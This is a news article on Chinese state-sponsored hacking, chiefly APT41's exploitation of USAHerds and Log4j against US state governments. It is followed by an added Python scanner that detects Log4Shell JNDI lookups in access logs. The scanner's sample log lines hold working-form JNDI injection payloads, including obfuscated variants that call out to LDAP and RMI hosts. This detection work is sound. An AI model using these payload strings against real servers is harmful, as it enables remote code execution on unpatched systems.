Chinese hacking groups target US and European governments
Three separate Chinese state-sponsored advanced persistent threat groups have been observed targeting victims, including U.S. state governments, European diplomatic entities and Gmail accounts linked to the U.S. government.
The first group, APT41, also known as Wicked Panda and Winnti, is believed by researchers at Mandiant Inc. to have compromised at least six U.S. state government networks. It did so by exploiting vulnerable internet-facing web applications, including a zero-day vulnerability in the USAHerds application and the then newly disclosed vulnerability in Apache Log4j.
The APT41 campaign ran between May 2021 and February 2022. Chinese state-sponsored actors targeting networks in the West is nothing new, but the researchers note one remarkable aspect: how quickly the group moves to exploit vulnerabilities once they become public. In the case of the now-infamous Log4j vulnerability, the group was exploiting it within hours of disclosure. Exploitation of the initial Log4j vulnerability (several more Log4j vulnerabilities were found afterward) directly led to the compromise of two U.S. state government networks, as well as targets in the insurance and telecoms sectors.
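Exploitation within hours of disclosure means defenders were hunting for Log4j attempts in web logs before patches could land. The following is an added example, not code from the article or from Mandiant: a small Python scanner over web-server access-log lines that first undoes the obfuscation attackers used against naive string matching (URL encoding, and Log4j's own nested lookups such as `${lower:j}` or `${::-j}`, which evaluate to a single character) and then flags the resulting `${jndi:...}` lookup by protocol. The log lines are constructed samples, not captured traffic, and the lookup-collapsing rules deliberately cover only the `${...:-default}` and `${lower:}`/`${upper:}` forms.

```python
"""Flag Log4Shell-style JNDI lookups in web access logs, including obfuscated variants.

Added illustration; not code from the article or from Mandiant. SAMPLE_LOG below is
constructed data. The normaliser handles two Log4j lookup forms attackers nest to hide
the literal string "jndi": ${anything:-default} (evaluates to the default) and
${lower:x} / ${upper:x} (case conversion). Anything else is left untouched.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# ${env:NOPE:-j}, ${::-j}, ${sys:x:-j} ... all evaluate to the text after ":-".
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# ${lower:J} -> "j", ${upper:j} -> "J".
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
# A fully normalised JNDI lookup: ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:[^}]*\}?", re.I)


def normalise(text: str) -> str:
    """Undo URL encoding (repeatedly, for double-encoding) and collapse nested lookups."""
    while True:
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:  # innermost lookups collapse first, so iterate to a fixed point
        prev = text
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        text = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, protocol, normalised lookup) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for m in _JNDI.finditer(normalise(line)):
            hits.append((lineno, m.group(1).lower(), m.group(0)))
    return hits


# Constructed sample access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:05:43 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:14:06:02 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.11 - - [10/Dec/2021:14:07:30 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.11/x}" "-"',
    '203.0.113.6 - - [10/Dec/2021:14:08:00 +0000] "GET /log4j-advisory HTTP/1.1" 200 1024 "-" "Log4Shell-checker/1.0"',
]

if __name__ == "__main__":
    for lineno, proto, payload in scan(SAMPLE_LOG):
        print(f"line {lineno}: {proto} lookup -> {payload}")
```

Normalising before matching is the point: the second and third hostile lines contain no literal "jndi" at all, and a grep for that string would miss both. The protocol is reported so analysts can prioritise (ldap and rmi callbacks imply an attacker-controlled listener), and the last sample shows that a benign mention of Log4Shell in a User-Agent does not trigger.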